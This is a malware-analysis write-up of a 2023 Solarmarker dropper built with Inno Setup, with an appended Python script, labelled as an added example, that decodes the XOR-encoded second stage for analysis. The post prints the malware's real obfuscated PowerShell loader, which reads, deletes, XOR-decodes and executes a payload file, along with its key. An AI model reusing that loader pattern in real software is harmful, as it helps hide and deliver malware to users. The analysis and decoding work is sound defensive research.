New Solarmarker Variant October 2023

Squiblydoo came across a new variant of Solarmarker malware and posted the findings here:
https://twitter.com/SquiblydooBlog/status/1717464614403735562
Unfortunately, this new version no longer works with my extractor tool, found here: https://github.com/securitymagic/tools/blob/main/extractsmdll.py

However, RussianPanda posted a new tool which can be used once the Inno package has been extracted.

A quick analysis suggests that the new dropper is built with Inno Setup. Standard tools can pull some of the data out of it, including fragments of the PowerShell command seen below: innounp unpacks the installer, and strings on the extracted CompiledCode.bin shows the XOR key and pieces of the loader command.
innounp -x -m .\Appendix-C-Acceptance-of-Acknowledgement-of-Policies-and.exe
strings .\CompiledCode.bin

WIN-VUA6POUV5UP
0CC47AC83803
JOHN-PC
FkLmng
TNewEdit
Cancel
{tmp}
.pdf
{tmp}\budget_fy2024.pdf
\..\
\budget_fy2024.pdf
open
{tmp}\data.dat
pSDubTWyjzdAhmBNLtROxasMKfJUPQVv
iex([Text.Encoding]::UTF8.GetString((({$F=[IO.File]::ReadAllBytes($args[0]);(rm $args[0]);return $F}.invoke('
'))|%{$_ -bxor '
'[$K++%32]})))
-command "
powershell


cat .\install_script.iss
;InnoSetupVersion=6.1.0 (Unicode)

[Setup]
AppName=ATech
AppVerName=ATech
AppId=ATech
AppVersion=3.1.0.2
DefaultDirName={tmp}\ATSoftware
OutputBaseFilename=Appendix-C-Acceptance-of-Acknowledgement-of-Policies-and
Compression=lzma2
PrivilegesRequired=lowest
DisableDirPage=auto
DisableProgramGroupPage=auto
WizardImageFile=embedded\WizardImage0.bmp,embedded\WizardImage1.bmp
WizardSmallImageFile=embedded\WizardSmallImage0.bmp,embedded\WizardSmallImage1.bmp


Upon running the malware, we can see that the initial PowerShell command references a DAT file which is XOR encoded. The following screenshot shows loading the DAT file and applying the XOR key in CyberChef. The issue with this method is that you have to be quick about it, since the DAT file is deleted shortly after use (the command itself removes it with rm $args[0] right after reading it).
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -cOmmAnD "iex([teXt.ENCOdING]::UTF8.gETstriNg((({$f=[IO.FILe]::REaDALLBytES($ArgS[0]); (rM $aRGs[0]);REtuRN $F}.iNVoKE('C:\uSerS\user\APpdAta\locaL\TeMp\IS-a5FP9.tMp\..\4641CBAc3D3FB07D6Af991E171087D4a.DAt'))|%{$_ -bXoR 'pSDubTWyjzdAhmBNLtROxasMKfJUPQVv'[$K++%32]})))"
Once decoded in CyberChef, the next PowerShell stage, which loads the malicious DLL in memory, is the same familiar code we've been seeing. This code can be modified to extract the DLL payload instead of loading it, as seen in the screenshots.


Once the modified code above is run, it extracts the DLL: https://www.virustotal.com/gui/file/79611ccdebf0fdafcf6844ea278314038ceda7b6f5c39ed7919cf6f7f2274c06/detection
Using the tool from RussianPanda
Extract the Inno package, read the contents of CompiledCode.bin to find the XOR key, then run the tool against the extracted data.dat file.
python decrypt_new_solarmarker_10-30-2023.py
Enter the path of the encrypted file: data.dat
Enter the XOR key: pSDubTWyjzdAhmBNLtROxasMKfJUPQVv
Enter the name of the output file to save the decrypted binary: evil.dll
Decrypted binary saved to: evil.dll


This removes the need to grab the TEMP file before it's deleted.
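As an added example (not the post's own code and not RussianPanda's decryptor), the following Python reproduces the two facts established above without running anything: the loader command line carries both the DAT path and the XOR key, and the transform is a plain byte-wise XOR of each byte with key[i % 32]. The regex, the helper names and the sample second stage are my own constructions; the command line and key are the ones quoted in the post.

```python
"""Recover the XOR-encoded Solarmarker DAT stage from the loader command line.

Added example, not code from the post or from RussianPanda's tool. It parses the
DAT path and XOR key out of the observed PowerShell command line (as captured
by process-creation telemetry) and applies the same byte-wise XOR the loader
applies, so the DAT contents can be decoded without ever executing them.
"""
import re
import sys

# Matches the loader command line quoted in the post. Case-insensitive because
# the sample randomises letter case (iNVoKE, REaDALLBytES, -bXoR). Assumed
# pattern: group 1 = path handed to .invoke(), group 2 = key string,
# group 3 = the modulus used in [$K++%32].
CMD_PATTERN = re.compile(
    r"\.invoke\('([^']+)'\).*?-bxor\s+'([^']+)'\[\$k\+\+%(\d+)\]",
    re.IGNORECASE | re.DOTALL,
)


def parse_loader_cmdline(cmdline):
    """Return (dat_path, key_bytes, modulus) for a matching command line, else None."""
    m = CMD_PATTERN.search(cmdline)
    if not m:
        return None
    return m.group(1), m.group(2).encode("ascii"), int(m.group(3))


def xor_decode(data, key):
    """Undo the loader's transform: byte i is XORed with key[i % len(key)]."""
    if not key:
        raise ValueError("XOR key must not be empty")
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def looks_like_script(blob):
    """Cheap plausibility check: the decoded stage is UTF-8 PowerShell text that
    the loader hands to iex, so it should decode and be mostly printable."""
    try:
        text = blob.decode("utf-8")
    except UnicodeDecodeError:
        return False
    printable = sum(ch.isprintable() or ch in "\r\n\t" for ch in text)
    return len(text) > 0 and printable / len(text) > 0.95


# The loader command line exactly as quoted in the post, split across lines
# only to keep the Python source readable.
OBSERVED_CMDLINE = (
    r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -cOmmAnD '
    r'"iex([teXt.ENCOdING]::UTF8.gETstriNg((({$f=[IO.FILe]::REaDALLBytES($ArgS[0]); '
    r'(rM $aRGs[0]);REtuRN $F}.iNVoKE('
    r"'C:\uSerS\user\APpdAta\locaL\TeMp\IS-a5FP9.tMp\..\4641CBAc3D3FB07D6Af991E171087D4a.DAt'"
    r"))|%{$_ -bXoR 'pSDubTWyjzdAhmBNLtROxasMKfJUPQVv'[$K++%32]})))" + '"'
)

SAMPLE_KEY = b"pSDubTWyjzdAhmBNLtROxasMKfJUPQVv"  # 32-byte key from the post

# Constructed stand-in for the second stage; the real one loads a DLL in memory.
SAMPLE_STAGE = b"Write-Host 'constructed second stage placeholder'\r\n"
# XOR is its own inverse, so encoding the stand-in with the same routine gives a
# DAT blob of the shape the loader expects.
SAMPLE_DAT = xor_decode(SAMPLE_STAGE, SAMPLE_KEY)


def recover_from_cmdline(cmdline, dat_bytes):
    """Whole workflow: key from telemetry, XOR the DAT contents, sanity-check."""
    parsed = parse_loader_cmdline(cmdline)
    if parsed is None:
        raise ValueError("command line does not match the loader pattern")
    _path, key, modulus = parsed
    if modulus != len(key):
        raise ValueError(f"modulus {modulus} does not match key length {len(key)}")
    stage = xor_decode(dat_bytes, key)
    return stage, looks_like_script(stage)


if __name__ == "__main__":
    # Usage: python recover_stage.py <data.dat> <xor key> <output file>
    if len(sys.argv) == 4:
        with open(sys.argv[1], "rb") as f:
            out = xor_decode(f.read(), sys.argv[2].encode("ascii"))
        with open(sys.argv[3], "wb") as f:
            f.write(out)
        print(f"wrote {len(out)} bytes; looks like a script: {looks_like_script(out)}")
    else:
        stage, ok = recover_from_cmdline(OBSERVED_CMDLINE, SAMPLE_DAT)
        print(stage.decode("utf-8"), ok)
```

Pointing this at the data.dat pulled out of the Inno package with the key from CompiledCode.bin gives the same result as the CyberChef step, and because the key also sits in the process command line, the same parse works on EDR or Sysmon process-creation events when the DAT file is already gone.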
